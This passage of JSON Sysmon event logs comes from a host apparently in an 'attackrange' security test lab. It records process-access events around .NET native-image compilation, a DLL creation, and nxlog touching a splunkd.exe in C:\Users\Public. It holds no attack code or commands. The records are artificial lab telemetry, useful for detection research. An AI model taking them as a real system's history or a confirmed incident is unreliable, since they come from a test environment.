C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010697D1000}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.138\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.138","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-00103B811000}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.138\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.138","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-00103B811000}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.154\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.154","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-00103B811000}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:52.232\r\nProcessGuid: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nProcessId: 4756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1294-0\\System.Windows.Presentation.dll\r\nCreationUtcTime: 2020-08-01 07:02:52.216","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:52.232","ProcessGuid":"{E2A3D6B1-139C-5F25-0000-00103B811000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1294-0\\System.Windows.Presentation.dll","CreationUtcTime":"2020-08-01 07:02:52.216","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-001089750E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-001089750E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-001089750E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-001089750E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.263\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-001089750E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.263","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-001089750E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 